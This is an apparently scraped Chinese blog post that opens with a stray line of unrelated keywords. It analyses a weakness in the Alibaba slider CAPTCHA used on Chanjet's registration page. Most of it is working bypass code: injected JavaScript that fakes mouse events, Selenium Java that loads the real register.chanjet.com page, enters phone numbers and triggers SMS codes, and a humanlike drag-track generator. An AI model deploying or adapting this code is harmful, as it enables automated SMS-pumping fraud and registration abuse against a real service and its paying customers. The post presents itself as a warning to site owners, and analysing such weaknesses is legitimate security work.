彩妆网站模板,做视频找素材的网站,如何清空网站空间,济南网站建设联系小七前言
由于网站注册入口容易被黑客攻击#xff0c;存在如下安全问题#xff1a;
暴力破解密码#xff0c;造成用户信息泄露短信盗刷的安全问题#xff0c;影响业务及导致用户投诉带来经济损失#xff0c;尤其是后付费客户#xff0c;风险巨大#xff0c;造成亏损无底洞…前言
由于网站注册入口容易被黑客攻击存在如下安全问题
暴力破解密码造成用户信息泄露短信盗刷的安全问题影响业务及导致用户投诉带来经济损失尤其是后付费客户风险巨大造成亏损无底洞 所以大部分网站及App 都采取图形验证码或滑动验证码等交互解决方案 但在机器学习能力提高的当下连百度这样的大厂都遭受攻击导致点名批评 图形验证及交互验证方式的安全性到底如何 请看具体分析
一、 畅捷通PC 注册入口
简介畅捷通信息技术股份有限公司是用友旗下成员企业公司成立于2010年3月并于2014年6月26日在香港联合交易所有限公司主板挂牌上市股份代码1588.HK是中国领先的小微企业财税及业务云服务提供商。畅捷通致力于用创想与技术推动小微企业经营与管理进步 二、 安全性分析报告
畅捷通采用的是阿里的滑动条存在一定的设计缺陷前端将密钥显示出来造成一定程度的安全漏洞,上报后并未引起重视漏洞依据存在。 三、 测试方法
前端界面分析这是阿里的滑动条网上有一些的教学视频但形式都差不多 阿里的滑动条有点像程咬金的三板斧 1 检测是否是 webdriver 有专门的文章怎么过检 2 滑动条检测
滑动条在页面嵌JS 就能过去
script(function () {use strict;/*** 休眠* [urlhome.php?modspaceuid952169]Param[/url] time 休眠时间单位秒* param desc* returns {Promiseunknown}*/function sleep(time, desc) {return new Promise(resolve {//sleepsetTimeout(() {console.log(desc, time, s)resolve(time)}, Math.floor(time * 1000))})}/*** 监测节点是否存在* param selector CSS选择器* param desc* returns {Promiseunknown}*/function obsHas(selector, desc) {return new Promise(resolve {//obs nodelet timer setInterval(() {let target document.querySelector(selector)if (!!target) {clearInterval(timer)console.log(desc, selector)resolve(selector)} else {return}}, 100)})}function slide(id) {var slider document.getElementById(id),container slider.parentNode;var rect slider.getBoundingClientRect(),x0 rect.x || rect.left,y0 rect.y || rect.top,w container.getBoundingClientRect().width,x1 x0 w,y1 y0;var mousedown document.createEvent(MouseEvents);mousedown.initMouseEvent(mousedown, true, true, window, 0,x0, y0, x0, y0, false, false, false, false, 0, null);slider.dispatchEvent(mousedown);var mousemove document.createEvent(MouseEvents);mousemove.initMouseEvent(mousemove, true, true, window, 0,x1, y1, x1, y1, false, false, false, false, 0, null);slider.dispatchEvent(mousemove);}sleep(1,sleep).then(() obsHas(.nc_wrapper,has)).then(() slide(nc_1_n1z))
})();/script
1. 模拟器交互
private final String INDEX_URL https://register.chanjet.com/register;Overridepublic RetEntity send(WebDriver driver, String areaCode, String phone) {RetEntity retEntity new RetEntity();try {driver.get(INDEX_URL);// 输入手机号WebElement phoneElemet driver.findElement(By.id(phoneNumber));phoneElemet.sendKeys(phone);Thread.sleep(1 * 1000);// 点击智能按钮boolean isRobot false;int beginX 790;int beginY 439;if (isRobot) {RobotMove.move(beginX, beginY, 320);} else {AliClient.moveExec(driver, nc_101_n1z, 320);}Thread.sleep(1 * 1000);WebElement btnElement ChromeDriverManager.waitElement(driver, By.id(submit), 10);if (btnElement null) {return null;}btnElement.click();Thread.sleep(1 * 1000);WebElement gtElement ChromeDriverManager.waitElement(driver, By.id(codeBtn), 10);String msg gtElement ! null ? gtElement.getText() : null;retEntity.setMsg(msg);if (msg ! null msg.contains(重新获取)) {retEntity.setRet(0);} return retEntity;} catch (Exception e) {System.out.println(phone phone ,e e.toString());for (StackTraceElement ele : e.getStackTrace()) {System.out.println(ele.toString());}return null;} finally {driver.manage().deleteAllCookies();}}
2. 模拟鼠标移动 public static boolean moveExec(WebDriver driver, String moveId, int distance) {try {// 获取滑动按钮WebElement moveElemet ChromeDriverManager.waitElement(driver, By.id(moveId), 100);Actions actions new Actions(driver);actions.moveToElement(moveElemet).perform();Thread.sleep(500);ListInteger trackList ActionMove.getTrack(distance);actions.clickAndHold(moveElemet).perform();// 按住鼠标左键不释放for (Integer moveInt : trackList) {actions.moveByOffset(moveInt, 0).perform();// 移动}actions.release(moveElemet).perform();// 释放鼠标左键// 滑动结果By langCntBy By.className(nc-lang-cnt);WebElement langCntElemet ChromeDriverManager.waitElement(driver, langCntBy, 50);String langCntInfo (langCntElemet ! null) ? langCntElemet.getText() : null;if (langCntInfo ! null langCntInfo.contains(验证通过)) {return true;} else {System.out.println(AliUtil.moveExec() langCntInfo langCntInfo);return false;}} catch (Exception e) {System.out.println(AliClient.moveExec() e e.toString());return false;}}
3. 轨迹生成单轴通过 /*** 根据距离获取滑动轨迹* * param distance需要移动的距离* return*/public static ListInteger getTrack(int distance) {ListInteger track new ArrayListInteger();// 移动轨迹ListInteger[] list getXyTrack(distance);for (Integer[] m : list) {track.add(m[0]);}return track;}/*** 双轴轨道生成算法主要实现平滑加速和减速* * param distance* return*/public static ListInteger[] getXyTrack(int distance) {ListInteger[] track new ArrayListInteger[]();// 移动轨迹try {int a (int) (distance / 3.0) random.nextInt(10);int h 0, current 0;// 已经移动的距离BigDecimal midRate new BigDecimal(0.7 (random.nextInt(10) / 100.00)).setScale(4, BigDecimal.ROUND_HALF_UP);BigDecimal mid new BigDecimal(distance).multiply(midRate).setScale(0, BigDecimal.ROUND_HALF_UP);// 减速阈值BigDecimal move null;// 每次循环移动的距离ListInteger[] subList new ArrayListInteger[]();// 移动轨迹boolean plus true;Double t 0.18, v 0.00, v0;while (current distance) {h random.nextInt(2);if (current distance / 2) {h h * -1;}v0 v;v v0 a * t;move new BigDecimal(v0 * t 1 / 2 * a * t * t).setScale(4, BigDecimal.ROUND_HALF_UP);// 加速if (move.intValue() 1)move new BigDecimal(1L);if (plus) {track.add(new Integer[] { move.intValue(), h });} else {subList.add(0, new Integer[] { move.intValue(), h });}current move.intValue();if (plus current mid.intValue()) {plus false;move new BigDecimal(0L);v 0.00;}}track.addAll(subList);int bk current - distance;if (bk 0) {for (int i 0; i bk; i) {track.add(new Integer[] { -1, h });}}System.out.println(getMoveTrack( midRate ) a a ,distance distance - mid mid.intValue() size track.size());return track;} catch (Exception e) {System.out.print(e.toString());return null;}}
4. 测试返回结果 四丶结语
畅捷通信息技术股份有限公司是用友旗下成员企业公司成立于2010年3月并于2014年6月26日在香港联合交易所有限公司主板挂牌上市股份代码1588.HK是中国领先的小微企业财税及业务云服务提供商。畅捷通致力于用创想与技术推动小微企业经营与管理进步畅捷通作为用友集团上市科技公司技术实力雄厚但在验证产品方面不是自己研发而是采用第三方的阿里的滑动条 阿里的产品由于过度重视用户体验 简单的滑动条特别模拟器只需要单轴的模拟轨道就可以通过 说明阿里对轨迹的校验比较宽松之前的分析显示阿里主要是靠模拟器识别如果这道关过了就没有其它的防护措施了 。 很多人在短信服务刚开始建设的阶段可能不会在安全方面考虑太多理由有很多。 比如“ 需求这么赶当然是先实现功能啊 ”“ 业务量很小啦系统就这么点人用不怕的 ” “ 我们怎么会被盯上呢不可能的 ”等等。 有一些理由虽然有道理但是该来的总是会来的。前期欠下来的债总是要还的。越早还问题就越小损失就越低。 所以大家在安全方面还是要重视。血淋淋的栗子#安全短信# 戳这里→康康你手机号在过多少网站注册过
谷歌图形验证码在AI 面前已经形同虚设所以谷歌宣布退出验证码服务 那么当所有的图形验证码都被破解时大家又该如何做好防御呢
相关阅读 《腾讯防水墙滑动拼图验证码》 《百度旋转图片验证码》 《网易易盾滑动拼图验证码》 《顶象区域面积点选验证码》 《顶象滑动拼图验证码》 《极验滑动拼图验证码》 《使用深度学习来破解 captcha 验证码》 《验证码终结者-基于CNNBLSTMCTC的训练部署套件》
